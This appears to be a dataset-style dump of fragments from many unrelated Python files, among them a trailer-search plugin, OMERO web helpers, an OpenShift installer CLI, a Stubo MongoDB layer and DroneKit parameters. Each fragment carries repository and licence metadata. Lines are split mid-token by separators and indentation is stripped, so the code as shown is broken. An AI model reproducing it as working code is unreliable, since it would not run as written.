itemlist.append(item.clone(title=title % "Búsqueda en Jayhap (Youtube, Vimeo & Dailymotion)",
action="jayhap_search", text_color="green"))
if item.contextual:
global window_select, result
select = Select("DialogSelect.xml", config.get_runtime_path(), item=item, itemlist=itemlist, caption="Buscando: "+item.contentTitle)
window_select.append(select)
select.doModal()
if item.windowed:
return result, window_select
else:
return itemlist
def manual_search(item):
logger.info()
texto
|
= platformtools.dialog_input(default=item.contentTitle, heading=config.get_localized_string(30112))
if texto is not None:
if item.extra == "abandomoviez":
return abandomoviez_search(item.clone(contentTitle=texto, page="", year=""))
el
|
if item.extra == "youtube":
return youtube_search(item.clone(contentTitle=texto, page=""))
elif item.extra == "filmaffinity":
return filmaffinity_search(item.clone(contentTitle=texto, page="", year=""))
elif item.extra == "jayhap":
return jayhap_search(item.clone(contentTitle=texto))
def tmdb_trailers(item, tipo="movie"):
logger.info()
from core.tmdb import Tmdb
itemlist = []
tmdb_search = None
if item.infoLabels['tmdb_id']:
tmdb_search = Tmdb(id_Tmdb=item.infoLabels['tmdb_id'], tipo=tipo, idioma_busqueda='es')
elif item.infoLabels['year']:
tmdb_search = Tmdb(texto_buscado=item.contentTitle, tipo=tipo, year=item.infoLabels['year'])
if tmdb_search:
for result in tmdb_search.get_videos():
title = result['name'] + " [" + result['size'] + "p] (" + result['language'].replace("en", "ING")\
.replace("es", "ESP")+") [tmdb/youtube]"
itemlist.append(item.clone(action="play", title=title, url=result['url'], server="youtube"))
return itemlist
def youtube_search(item):
logger.info()
itemlist = []
titulo = item.contentTitle
if item.extra != "youtube":
titulo += " trailer"
# Comprueba si es una búsqueda de cero o viene de la opción Siguiente
if item.page != "":
data = scrapertools.downloadpage(item.page)
else:
titulo = urllib.quote(titulo)
titulo = titulo.replace("%20", "+")
data = scrapertools.downloadpage("https://www.youtube.com/results?sp=EgIQAQ%253D%253D&q="+titulo)
data = re.sub(r"\n|\r|\t|\s{2}| ", "", data)
patron = '<span class="yt-thumb-simple">.*?(?:src="https://i.ytimg.com/|data-thumb="https://i.ytimg.com/)([^"]+)"' \
'.*?<h3 class="yt-lockup-title ">.*?<a href="([^"]+)".*?title="([^"]+)".*?' \
'</a><span class="accessible-description".*?>.*?(\d+:\d+)'
matches = scrapertools.find_multiple_matches(data, patron)
for scrapedthumbnail, scrapedurl, scrapedtitle, scrapedduration in matches:
scra
|
CodeTengu/jokekappa
|
tests/test_core.py
|
Python
|
mit
| 127
| 0
|
# coding: u
|
tf-8
import unittest
import jokekappa
class VoidTest(unittest.TestCase):
def test_
|
void(self):
pass
|
simleo/openmicroscopy
|
components/tools/OmeroWeb/omeroweb/webclient/show.py
|
Python
|
gpl-2.0
| 37,362
| 0.00008
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2014 University of Dundee & Open Microscopy Environment.
# All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""
Generic functionality for handling particular links and "showing" objects
in the OMERO.web tree view.
"""
import omero
import re
from omero.rtypes import rint, rlong
from django.core.urlresolvers import reverse
from copy import deepcopy
from django.conf import settings
class IncorrectMenuError(Exception):
"""Exception to signal that we are on the wrong menu."""
def __init__(self, uri):
"""
Constructs a new Exception instance.
@param uri URI to redirect to.
@type uri String
"""
super(Exception, self).__init__()
self.uri = uri
class Show(object):
"""
This object is used by most of the top-level pages. The "show" and
"path" query strings are used by this object to both direct OMERO.web to
the correct locations in the hierarchy and select the correct objects
in that hierarchy.
"""
# List of prefixes that are at the top level of the tree
TOP_LEVEL_PREFIXES = ('project', 'screen', 'tagset')
# List of supported object types
SUPPORTED_OBJECT_TYPES = (
'project', 'dataset', 'image', 'screen', 'plate', 'tag',
'acquisition', 'run', 'well', 'tagset'
)
# Regular expression which declares the format for a "path" used either
# in the "path" or "show" query string. No modifications should be made
# to this regex without corresponding unit tests in
# "tests/unit/test_show.py".
PATH_REGEX = re.compile(
r'(?P<object_type>\w+)\.?(?P<key>\w+)?[-=](?P<value>[^\|]*)\|?'
)
# Regular expression for matching Well names
WELL_REGEX = re.compile(
'^(?:(?P<alpha_row>[a-zA-Z]+)(?P<digit_column>\d+))|'
'(?:(?P<digit_row>\d+)(?P<alpha_column>[a-zA-Z]+))$'
)
def __init__(self, conn, request, menu):
"""
Constructs a Show instance. The instance will not be fully
initialised until the first retrieval of the L{Show.first_selected}
property.
@param conn OMERO gateway.
@type conn L{omero.gateway.BlitzGateway}
@param request Django HTTP request.
@type request L{django.http.HttpRequest}
@param menu Literal representing the current menu we are on.
@type menu String
"""
# The list of "paths" ("type-id") we have been requested to
# show/select in the user interface. May be modified if one or
# more of the elements is not in the tree. This is currently the
# case for all Screen-Plate-Well hierarchy elements below Plate
# (Well for example).
self._initially_select = list()
# The nodes of the tree that will be initially open based on the
# nodes that are initially selected.
self._initially_open = list()
# The owner of the node closest to the root of the tree from the
# list of initially open nodes.
self._initially_open_owner = None
# First selected node from the requested initially open "paths"
# that is first loaded on first retrieval of the "first_selected"
# property.
self._first_selected = None
self.conn = conn
self
|
.request = request
self.menu = menu
path = self.request.GET.get('path', '').split('|')[-1]
self._add_if_supported(path)
show = self.request.GET.get('show', '')
for path in show.split('|'):
self._add_if_supported(path)
def _add_if_supported(self, path):
"""A
|
dds a path to the initially selected list if it is supported."""
m = self.PATH_REGEX.match(path)
if m is None:
return
object_type = m.group('object_type')
key = m.group('key')
value = m.group('value')
if key is None:
key = 'id'
if object_type in self.SUPPORTED_OBJECT_TYPES:
# 'run' is an alternative for 'acquisition'
object_type = object_type.replace('run', 'acquisition')
self._initially_select.append(
'%s.%s-%s' % (object_type, key, value)
)
def _load_tag(self, attributes):
"""
Loads a Tag based on a certain set of attributes from the server.
@param attributes Set of attributes to filter on.
@type attributes L{dict}
"""
# Tags have an "Annotation" suffix added to the object name so
# need to be loaded differently.
return next(self.conn.getObjects(
"TagAnnotation", attributes=attributes
))
def get_well_row_column(self, well):
"""
Retrieves a tuple of row and column as L{int} for a given Well name
("A1" or "1A") string.
@param well Well name string to retrieve the row and column tuple for.
@type well L{str}
"""
m = self.WELL_REGEX.match(well)
if m is None:
return None
# We are using an algorithm that expects alpha columns and digit
# rows (like a spreadsheet). is_reversed will be True if those
# conditions are not met, signifying that the row and column
# calculated needs to be reversed before returning.
is_reversed = False
if m.group('alpha_row') is not None:
a = m.group('alpha_row').upper()
b = m.group('digit_column')
is_reversed = True
else:
a = m.group('alpha_column').upper()
b = m.group('digit_row')
# Convert base26 column string to number. Adapted from XlsxWriter:
# * https://github.com/jmcnamara/XlsxWriter
# * xlsxwriter/utility.py
n = 0
column = 0
for character in reversed(a):
column += (ord(character) - ord('A') + 1) * (26 ** n)
n += 1
# Convert 1-index to zero-index
row = int(b) - 1
column -= 1
if is_reversed:
return column, row
return row, column
def _load_well(self, attributes):
"""
Loads a Well based on a certain set of attributes from the server.
@param attributes Set of attributes to filter on.
@type attributes L{dict}
"""
if 'id' in attributes:
return self.conn.getObject('Well', attributes=attributes)
if 'name' in attributes:
row, column = self.get_well_row_column(attributes['name'])
path = self.request.GET.get('path', '')
for m in self.PATH_REGEX.finditer(path):
object_type = m.group('object_type')
# May have 'run' here rather than 'acquisition' because
# the path will not have been validated and replaced.
if object_type not in ('plate', 'run', 'acquisition'):
continue
# 'run' is an alternative for 'acquisition'
object_type = object_type.replace('run', 'acquisition')
# Try and load the potential parent first
key = m.group('key')
value = m.group('value')
if key is None:
key = 'id'
if key == 'id':
value = long(value)
parent_attributes = {key: value}
parent, = self.conn.getObjects(
object_type, attributes=parent_attributes
)
|
menren/openshift-ansible
|
utils/src/ooinstall/cli_installer.py
|
Python
|
apache-2.0
| 31,431
| 0.003213
|
# TODO: Temporarily disabled due to importing old code into openshift-ansible
# repo. We will work on these over time.
# pylint: disable=bad-continuation,missing-docstring,no-self-use,invalid-name,no-value-for-parameter
import click
import os
import re
import sys
from ooinstall import openshift_ansible
from ooinstall import OOConfig
from ooinstall.oo_config import OOConfigInvalidHostError
from ooinstall.oo_config import Host
from ooinstall.variants import find_variant, get_variant_version_combos
DEFAULT_ANSIBLE_CONFIG = '/usr/share/atomic-openshift-utils/ansible.cfg'
DEFAULT_PLAYBOOK_DIR = '/usr/share/ansible/openshift-ansible/'
def validate_ansible_dir(path):
if not path:
raise click.BadParameter('An ansible path must be prov
|
ided')
return path
# if not os.path.exists(path)):
# raise click.BadParameter("Path \"{}\" doesn't exist".format(path))
def is_valid_hostname(hostname):
if not hostname or len(hostname) > 255:
return False
if hostname[-1] == ".":
hostname = hostname[:-1] # strip exactly one dot fro
|
m the right, if present
allowed = re.compile(r"(?!-)[A-Z\d-]{1,63}(?<!-)$", re.IGNORECASE)
return all(allowed.match(x) for x in hostname.split("."))
def validate_prompt_hostname(hostname):
if '' == hostname or is_valid_hostname(hostname):
return hostname
raise click.BadParameter('"{}" appears to be an invalid hostname. ' \
'Please double-check this value i' \
'and re-enter it.'.format(hostname))
def get_ansible_ssh_user():
click.clear()
message = """
This installation process will involve connecting to remote hosts via ssh. Any
account may be used however if a non-root account is used it must have
passwordless sudo access.
"""
click.echo(message)
return click.prompt('User for ssh access', default='root')
def list_hosts(hosts):
hosts_idx = range(len(hosts))
for idx in hosts_idx:
click.echo(' {}: {}'.format(idx, hosts[idx]))
def delete_hosts(hosts):
while True:
list_hosts(hosts)
del_idx = click.prompt('Select host to delete, y/Y to confirm, ' \
'or n/N to add more hosts', default='n')
try:
del_idx = int(del_idx)
hosts.remove(hosts[del_idx])
except IndexError:
click.echo("\"{}\" doesn't match any hosts listed.".format(del_idx))
except ValueError:
try:
response = del_idx.lower()
if response in ['y', 'n']:
return hosts, response
click.echo("\"{}\" doesn't coorespond to any valid input.".format(del_idx))
except AttributeError:
click.echo("\"{}\" doesn't coorespond to any valid input.".format(del_idx))
return hosts, None
def collect_hosts(version=None, masters_set=False, print_summary=True):
"""
Collect host information from user. This will later be filled in using
ansible.
Returns: a list of host information collected from the user
"""
click.clear()
click.echo('*** Host Configuration ***')
message = """
You must now specify the hosts that will compose your OpenShift cluster.
Please enter an IP or hostname to connect to for each system in the cluster.
You will then be prompted to identify what role you would like this system to
serve in the cluster.
OpenShift Masters serve the API and web console and coordinate the jobs to run
across the environment. If desired you can specify multiple Master systems for
an HA deployment, in which case you will be prompted to identify a *separate*
system to act as the load balancer for your cluster after all Masters and Nodes
are defined.
If only one Master is specified, an etcd instance embedded within the OpenShift
Master service will be used as the datastore. This can be later replaced with a
separate etcd instance if desired. If multiple Masters are specified, a
separate etcd cluster will be configured with each Master serving as a member.
Any Masters configured as part of this installation process will also be
configured as Nodes. This is so that the Master will be able to proxy to Pods
from the API. By default this Node will be unschedulable but this can be changed
after installation with 'oadm manage-node'.
OpenShift Nodes provide the runtime environments for containers. They will
host the required services to be managed by the Master.
http://docs.openshift.com/enterprise/latest/architecture/infrastructure_components/kubernetes_infrastructure.html#master
http://docs.openshift.com/enterprise/latest/architecture/infrastructure_components/kubernetes_infrastructure.html#node
"""
click.echo(message)
hosts = []
more_hosts = True
num_masters = 0
while more_hosts:
host_props = {}
host_props['connect_to'] = click.prompt('Enter hostname or IP address',
value_proc=validate_prompt_hostname)
if not masters_set:
if click.confirm('Will this host be an OpenShift Master?'):
host_props['master'] = True
num_masters += 1
if version == '3.0':
masters_set = True
host_props['node'] = True
#TODO: Reenable this option once container installs are out of tech preview
#rpm_or_container = click.prompt('Will this host be RPM or Container based (rpm/container)?',
# type=click.Choice(['rpm', 'container']),
# default='rpm')
#if rpm_or_container == 'container':
# host_props['containerized'] = True
#else:
# host_props['containerized'] = False
host_props['containerized'] = False
host = Host(**host_props)
hosts.append(host)
if print_summary:
print_installation_summary(hosts)
# If we have one master, this is enough for an all-in-one deployment,
# thus we can start asking if you wish to proceed. Otherwise we assume
# you must.
if masters_set or num_masters != 2:
more_hosts = click.confirm('Do you want to add additional hosts?')
if num_masters >= 3:
collect_master_lb(hosts)
return hosts
def print_installation_summary(hosts):
"""
Displays a summary of all hosts configured thus far, and what role each
will play.
Shows total nodes/masters, hints for performing/modifying the deployment
with additional setup, warnings for invalid or sub-optimal configurations.
"""
click.clear()
click.echo('*** Installation Summary ***\n')
click.echo('Hosts:')
for host in hosts:
print_host_summary(hosts, host)
masters = [host for host in hosts if host.master]
nodes = [host for host in hosts if host.node]
dedicated_nodes = [host for host in hosts if host.node and not host.master]
click.echo('')
click.echo('Total OpenShift Masters: %s' % len(masters))
click.echo('Total OpenShift Nodes: %s' % len(nodes))
if len(masters) == 1:
ha_hint_message = """
NOTE: Add a total of 3 or more Masters to perform an HA installation."""
click.echo(ha_hint_message)
elif len(masters) == 2:
min_masters_message = """
WARNING: A minimum of 3 masters are required to perform an HA installation.
Please add one more to proceed."""
click.echo(min_masters_message)
elif len(masters) >= 3:
ha_message = """
NOTE: Multiple Masters specified, this will be an HA deployment with a separate
etcd cluster. You will be prompted to provide the FQDN of a load balancer once
finished entering hosts."""
click.echo(ha_message)
dedicated_nodes_message = """
WARNING: Dedicated Nodes are recommended for an HA deployment. If no dedicated
Nodes are specified, each configured Master will be marked as a schedulable
Node."""
min_ha_nodes_message = """
WARNING: A minimum of 3 dedicated Nodes are recommended for an HA
deployment."""
if len(dedicated_nodes) == 0:
click.e
|
grollins/foldkin
|
foldkin/simple/__init__.py
|
Python
|
bsd-2-clause
| 27
| 0
|
f
|
rom simple_model import
|
*
|
ah-anssi/SecuML
|
SecuML/core/DimensionReduction/Algorithms/Projection/Itml.py
|
Python
|
gpl-2.0
| 1,021
| 0
|
# SecuML
# Copyright (C) 2016 ANSSI
#
# SecuML is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# SecuML is distributed in the hope that it will be useful,
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# with SecuML. If not, see <http://www.gnu.org/licenses/>.
import metric_learn
import numpy as np
from .SemiSupervisedProjection import SemiSupervisedProjection
class Itml(SemiSupervisedProjection):
def __ini
|
t__(self, conf):
SemiSupervisedProjection.__init__(self, conf)
self.projection = metric_learn.itml.ITML_Supervised()
def setProjectionMatrix(self):
self.projection_matrix = np.transpose(
self.pipeline.named_steps['projection'].transformer())
|
Stub-O-Matic-BA/stubo-app
|
stubo/model/db.py
|
Python
|
gpl-3.0
| 23,064
| 0.002688
|
"""
:copyright: (c) 2015 by OpenCredo.
:license: GPLv3, see LICENSE for more details.
"""
from pymongo import MongoClient, DESCENDING, ASCENDING
import logging
from bson.objectid import ObjectId
from stubo.utils import asbool
from stubo.model.stub import Stub
import hashlib
import time
import motor
import os
default_env = {
'port': 27017,
'max_pool_size': 20,
'tz_aware': True,
'db': 'stubodb'
}
def coerce_mongo_param(k, v):
if k in ('port', 'max_pool_size'):
return int(v)
elif k in ('tz_aware',):
return asbool(v)
return v
log = logging.getLogger(__name__)
mongo_client = None
def motor_driver(settings):
"""
Returns asynchronous Motor client. If user and password provided in config file - returns authenticated connection
:param settings:
:return:
"""
# checking for environment variables
mongo_uri = os.getenv("MONGO_URI")
mongo_db = os.getenv("MONGO_DB")
if mongo_uri and mongo_db:
client = motor.MotorClient(mongo_uri)
log.info("MongoDB environment variables found: %s!" % mongo_uri)
return client[mongo_db]
# environment variables not found, looking for details from configuration file
user = settings.get('mongo.user', None)
password = settings.get('mongo.password', None)
if user and password:
uri = "mongodb://{user}:{password}@{host}:{port}/{database_name}".format(
user=user,
password=password,
host=settings['mongo.host'],
port=settings['mongo.port'],
database_name=settings['mongo.db']
)
client = motor.MotorClient(uri)
else:
client = motor.MotorClient(settings['mongo.host'], int(settings['mongo.port']))
return client[settings['mongo.db']]
def get_mongo_client():
return mongo_client
def get_connection(env=None):
"""
Gets MongoDB connection. If user and password provided - authenticates (logs in)
:param env: dictionary, example:
{'host': 'ds045454.mongolab.com',
'tz_aware': True,
'max_pool_size': 10,
'port': 45454}
:return: MongoClient
"""
# checking for environment variables
mongo_uri = os.getenv("MONGO_URI")
mongo_db = os.getenv("MONGO_DB")
if mongo_uri and mongo_db:
client = MongoClient(mongo_uri)
log.info("MongoDB environment variables found: %s!" % mongo_uri)
return client[mongo_db]
# environment variables not found, looking for details from configuration file
env = env or default_env
_env = env.copy()
dbname = _env.pop('db', None)
# if auth details supplied - getting details
user = password = None
if 'user' in _env:
user = _env.pop('user')
if 'password' in _env:
password = _env.pop('password')
client = MongoClient(**_env)
if dbname:
log.debug('using db={0}'.format(dbname))
client = getattr(client, dbname)
# authenticating
if user and password:
# if fails - throws exception which will be handled in run_stubo.py
client.authenticate(user, password)
log.info("Login to MongoDB successful!")
return client
class Scenario(object):
def __init__(self, db=None):
self.db = db or mongo_client
assert self.db
def get_stubs(self, name=None):
if name:
filter = {'scenario': name}
return self.db.scenario_stub.find(filter)
else:
return self.db.scenario_stub.find()
def get_pre_stubs(self, name=None):
if name:
query = {'scenario': name}
return self.db.pre_scenario_stub.find(query)
else:
return self.db.scenario_pre_stub.find()
def stub_count(self, name):
return self.get_stubs(name).count()
def get(self, name):
return self.db.scenario.find_one({'name': name})
def get_all(self, name=None):
if name:
cursor = self.db.scenario.find({'name': name})
else:
cursor = self.db.scenario.find()
return cursor
def insert(self, **kwargs):
return self.db.scenario.insert(kwargs)
def change_name(self, name, new_name):
"""
Rename scenario and all stubs
:param name: current scenario name
:param new_name: new scenario name
:return: statistics, how many stubs were changed
"""
# updating scenario stub collection. You have to specify all parameters as booleans up to the one that you
# actually want, in our case - the fourth parameter "multi" = True
# update(spec, document[, upsert=False[,
# manipulate=False[, safe=None[, multi=False[, check_keys=True[, **kwargs]]]]]])
response = {
'Old name': name,
"New name": new_name
}
try:
result = self.db.scenario_stub.update(
{'scenario': name}, {'$set': {'scenario': new_name}}, False, False, None, True)
try:
response['Stubs changed'] = result['nModified']
except KeyError:
# older versions of mongodb returns 'n' instead of 'nModified'
response['Stubs changed'] = result['n']
except Exception as ex1:
# this is probably KeyError, leaving Exception for debugging purposes
log.debug("Could not get STUB nModified key, result returned: %s. Error: %s" % (result, ex1))
except Exception as ex:
log.debug("Could not update scenario stub, got error: %s " % ex)
response['Stubs changed'] = 0
# updating pre stubs
try:
result = self.db.scenario_pre_stub.update(
{'scenario': name}, {'$set': {'scenario': new_name}}, False, False, None, True)
try:
response['Pre stubs changed'] = result['nModified']
except KeyError:
# older versions of mongodb returns 'n' instead of 'nModified'
response['Pre stubs changed'] = result['n']
|
except Exception as ex1:
log.debug("Could not get PRE STUB nModified key, result returned: %s. Error: %s" % (result, ex1))
except Exception as ex:
log.debug("Could not update scenario pre stub, got error: %s" % ex)
response['Pre stubs changed'] = 0
try:
# updating scenario itself
result = self.db.scenario.update({'name': name}, {'name': new_name})
try:
response['Scenarios cha
|
nged'] = result['nModified']
except KeyError:
# older versions of mongodb returns 'n' instead of 'nModified'
response['Scenarios changed'] = result['n']
except Exception as ex1:
log.debug("Could not get SCENARIO nModified key, result returned: %s. Error: %s" % (result, ex1))
except Exception as ex:
log.debug("Could not update scenario, got error: %s" % ex)
response['Scenarios changed'] = 0
return response
def recorded(self, name=None):
"""
Calculates scenario recorded date. If name is not supplied - returns a dictionary with scenario name and
recorded date:
{ 'scenario_1': '2015-05-07',
'scenario_2': '2015-05-07'}
If a name is supplied - returns recorded date string (since MongoDB does not support DateTimeField).
:param name: optional parameter to get recorded date for specific scenario
:return: <dict> - if name is not supplied, <string> with date - if scenario name supplied.
"""
start_time = time.time()
pipeline = [
{'$group': {
'_id': '$scenario',
'recorded': {'$max': '$recorded'}}}]
# use the pipe to calculate latest date
try:
result = self.db.command('aggregate', 'scenario_stub', pipeline=pipeline)['result']
except KeyError as ex:
log.error(ex)
return None
except Exception as ex:
log.error("Go
|
tferreira/Flask-Redis
|
application/models.py
|
Python
|
mit
| 170
| 0
|
# from index import db
# class MyObject():
|
# def __init__(self):
# pass
# @staticmethod
# def get_something(arg1, arg2):
# return something
| |
CorySpitzer/FizzBuzz
|
everest/FizzBuzz.py
|
Python
|
mit
| 175
| 0.091429
|
n = 1
while n <= 100:
if (n % 3 == 0 and n % 5
|
== 0):
print "FizzBuzz"
elif (n % 3 == 0)
|
:
print "Fizz"
elif (n % 5 == 0):
print "Buzz"
else:
print n
n += 1
|
LeonNie52/dk-plus
|
test files/params.py
|
Python
|
gpl-3.0
| 13,072
| 0.008415
|
"""
The parameters class. It is initialized with the vehicle's attributes at time of construction
but it is constantly updated through attribute listeners after calling the add_listeners() function
These parameters can provide the basic info for a future collision avoidance scheme.
Any functions that can refer to the parameters can be written here.
Added support for "dummy" initialization for experimental purposes
"""
from dronekit import connect, Command, VehicleMode, LocationGlobalRelative, LocationGlobal, socket
import uuid, random, time
class Params:
def __init__(self, network=None, vehicle=None, dummy=False):
if dummy:
self.ID = random.randint(1000, 9999)
self.last_recv = time.time()
self.version = 1
self.ekf_ok = False
self.gps_fix = 3
self.gps_sat = 10
self.gps_eph = 100
self.gps_epv = 200
self.set_global_alt = True
self.set_attitude = True
self.mode = "AUTO"
self.global_alt = 10
self.global_lat = -35.3632086902
self.global_lon = 149.165274916
self.distance_from_self = None
self.mission_importance = 0
self.heading = 300 #degrees
self.next_wp = None
self.next_wp_lat = None
self.next_wp_lon = None
self.next_wp_alt = None
self.battery_level = 100 #percentage
self.velocity = [0.5, -3.1, 0.7] #m/s, airspeed
self.groundspeed = 3.46 #m/s
self.airspeed = 3.46 #m/s
self.system_status = "OK"
else:
self.ID = uuid.uuid4().int #Random UUID
self.last_recv = None
self.version = vehicle.version.release_version()
self.ekf_ok = vehicle.ekf_ok
self.gps_fix = vehicle.gps_0.fix_type
self.gps_sat = vehicle.gps_0.satellites_visible
self.gps_eph = vehicle.gps_0.eph
self.gps_epv = vehicle.gps_0.epv
self.set_global_alt = vehicle.capabilities.set_altitude_target_global_int
self.set_attitude = vehicle.capabilities.set_attitude_target
self.mode = vehicle.mode.name
self.global_alt = vehicle.location.global_relative_frame.alt
self.global_lat = vehicle.location.global_relative_frame.lat
self.global_lon = vehicle.location.global_relative_frame.lon
self.distance_from_self = None
self.mission_importance = 0 #default, for hobbyists and recreation
self.heading = vehicle.heading #degrees
self.next_wp = None
self.next_wp_lat = None
self.next_wp_lon = None
self.next_wp_alt = None
self.battery_level = vehicle.battery.level #percentage
self.velocity = vehicle.velocity #m/s, airspeed
self.groundspeed = vehicle.groundspeed #m/s
self.airspeed = vehicle.airspeed #m/s
self.system_status = vehicle.system_status.state
self.add_listeners(network, vehicle)
def add_listeners(self, network, vehicle):
"""
The function to observe updated values. These values must be contained in the params class
and a networking scheme (through drone_network) must be active.
Object vehicle can be accesed through network.vehicle but it is an input for
the correct syntax of python's decorator functions.
Any observers here are implemented based on the tutorial found in:
http://python.dronekit.io/automodule.html#dronekit.Locations.on_attribute
Some of the values pass through thresholding so as to limit writes.
Thresholding is done based on experience and needs
"""
if network == None:
print "No listeners added due to unknown network"
return
#State of System (Initializing, Emergency, etc.)
@vehicle.on_attribute('system_status')
def decorated_system_status_callback(self, attr_name, value):
network.vehicle_params.system_status = value.state
print 'System status changed to: ', network.vehicle_params.system_status
#Battery information
@vehicle.on_attribute('battery')
def decorated_battery_callback(self, attr_name, value):
if network.vehicle_params.battery_level == value.level:
pass
else:
network.vehicle_params.battery_level = value.level
#print 'Battery level: ', network.vehicle_params.battery_level
#Velocity information (m/s)
#return velocity in all three axis
@vehicle.on_attribute('velocity')
def decorated_velocity_callback(self, attr_name, value):
if network.vehicle_params.velocity == value:
pass
else:
network.vehicle_params.velocity = value
#print 'Velocity changed to:\n', network.vehicle_params.velocity, ' m/s'
"""
Airspeed and groundspeed are exactly the same in the simulation but
this is not applicable in real-life scenarios.
Tolerance is added to cm scale
Return: speed (m/s)
"""
@vehicle.on_attribute('airspeed')
def decorated_airspeed_callback(self, attr_name, value):
if network.vehicle_params.airspeed == round(value, 2):
pass
else:
network.vehicle_params.airspeed = round(value, 2)
#print 'Airspeed changed to: ', network.vehicle_params.airspeed, ' m/s'
@vehicle.on_attribute('groundspeed')
def decorated_groundspeed_callback(self, attr_name, value):
if network.vehicle_params.groundspeed == round(value, 2):
pass
else:
network.vehicle_params.groundspeed = round(value, 2)
#print 'Groundspeed changed to: ', network.vehicle_params.groundspeed, ' m/s'
#State of EKF
#return: True/False
@vehicle.on_attribute('vehicle.ekf_ok')
def decorated_ekf_ok_callback(self, attr_name, value):
network.vehicle_params.ekf_ok = value
print 'EKF availability changed to: ', network.vehicle_params.ekf_ok
#GPS-related info
#return: .eph (HDOP) .epv (VDOP) .fix_type .satellites_visible
@vehicle.on_attribute('vehicle.gps_0')
|
def decorated_gps_callback(self, attr_name, value):
network.vehicle_params.gps_fix = value.fix_type
network.vehicle_params.gps_sat = value.satellites_visible
network.vehicle_params.gps_eph = value.eph
network.vehicle_params.gps_epv = value.epv
print 'GPSInfo changed to:\nFix:', network.vehicle_params.gps_fix, \
'\nSatellites:', network.vehicle_params.gps_sat, '\nEPH:', network.vehicle_
|
params.gps_eph, \
'\nEPV: ', network.vehicle_params.gps_epv
#Set altitude offboard
#return: True/False
@vehicle.on_attribute('set_altitude_target_global_int')
def decorated_set_global_altitude_callback(self, attr_name, value):
network.vehicle_params.set_global_alt = value
print 'Ability to set global altitude changed to: ', network.vehicle_params.set_global_alt
#Set attitude offboard
#return: True/False
@vehicle.on_attribute('set_attitude_target')
def decorated_set_attitude_callback(self, attr_name, value):
network.vehicle_params.set_attitude = value
print 'Ability to set attitude changed to: ', network.vehicle_params.set_attitude
#Flying mode
@vehicle.on_attribute('mode')
def decorated_mode_callback(self, attr_name, value):
network.vehicle_params.mode = value.name
print 'Mode changed to: ', network.vehicle_params.mode
"""
A precision of 7 decimal digits in lat/lon degrees is satisfactory.
Tolerance of 7 decimal digits in degrees equals 11 milimetres
http://gis.stackexchange.com/questions/8650/how-to-measure-the-accuracy-of-latitude-and-longitude
Returns: altitude (
|
pygeo/pycmbs
|
pycmbs/benchmarking/models/cmip5.py
|
Python
|
mit
| 20,505
| 0.003755
|
# -*- coding: utf-8 -*-
"""
This file is part of pyCMBS.
(c) 2012- Alexander Loew
For COPYING and LICENSE details, please refer to the LICENSE file
"""
from cdo import Cdo
from pycmbs.data import Data
import tempfile as tempfile
import copy
import glob
import os
import sys
import ast
import numpy as np
from pycmbs.benchmarking import preprocessor
from pycmbs.benchmarking.utils import get_T63_landseamask, get_temporary_directory
from pycmbs.benchmarking.models.model_basic import *
from pycmbs.utils import print_log, WARNING
class CMIP5Data(Model):
"""
Class for CMIP5 model simulations. This class is derived from C{Model}.
"""
def __init__(self, data_dir, model, experiment, dic_variables, name='', shift_lon=False, **kwargs):
"""
Parameters
----------
data_dir : str
directory that specifies the root directory where the data is located
model : TBD todo
experiment : str
specifies the ID of the experiment
dic_variables : TODO
name : str
name of model
shift_lon : bool
specifies if longitudes of data need to be shifted
kwargs : dict
other keyword arguments
"""
if name == '':
name = model
super(CMIP5Data, self).__init__(data_dir, dic_variables, name=name, shift_lon=shift_lon, **kwargs)
self.model = model
self.experiment = experiment
self.data_dir = data_dir
self.shift_lon = shift_lon
self.type = 'CMIP5'
self._unique_name = self._get_unique_name()
def _get_unique_name(self):
"""
get unique name from model and experiment
Returns
-------
string with unique combination of models and experiment
"""
s = self.model.replace(' ', '') + '-' + self.experiment.replace(' ', '')
s = s.replace('#', '-')
if hasattr(self, 'ens_member'):
s += '-' + str(self.ens_member)
return s
def get_rainfall_data(self, interval='season', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_wind(self, interval='season', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_evaporation(self, interval='season', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_latent_heat_flux(self, interval='season', **kwargs):
return self.get_model_data_generic(interval=interval, **kwargs)
def get_model_data_generic(self, interval='season', **kwargs):
"""
unique parameters are:
filename - file basename
variable - name of the variable as the short_name in the netcdf file
kwargs is a dictionary with keys for each model. Then a dictionary with properties follows
"""
if not self.type in kwargs.keys():
print ''
print 'WARNING: it is not possible to get data using generic function, as method missing: ', self.type, kwargs.keys()
assert False
locdict = kwargs[self.type]
# read settings and details from the keyword arguments
# no defaults; everything should be explicitely specified in either the config file or the dictionaries
varname = locdict.pop('variable', None)
#~ print self.type
#~ print locdict.keys()
assert varname is not None, 'ERROR: provide varname!'
units = locdict.pop('unit', None)
assert units is not None, 'ERROR: provide unit!'
lat_name = locdict.pop('lat_name', 'lat')
lon_name = locdict.pop('lon_name', 'lon')
model_suffix = locdict.pop('model_suffix', None)
model_prefix = locdict.pop('model_prefix', None)
file_format = locdict.pop('file_format')
scf = locdict.pop('scale_factor')
valid_mask = locdict.pop('valid_mask')
custom_path = locdict.pop('custom_path', None)
thelevel = locdict.pop('level', None)
target_grid = self._actplot_options['targetgrid']
interpolation = self._actplot_options['interpolation']
if custom_path is None:
filename1 = self.get_raw_filename(varname, **kwargs) # routine needs to be implemented by each subclas
|
s
else:
filename1 = custom_path + self.get_raw_filename(varname, **kwargs)
if filename1 is None:
print_log(WARNING, 'No valid model input data')
return None
force_calc = False
if self.start_time is N
|
one:
raise ValueError('Start time needs to be specified')
if self.stop_time is None:
raise ValueError('Stop time needs to be specified')
#/// PREPROCESSING ///
cdo = Cdo()
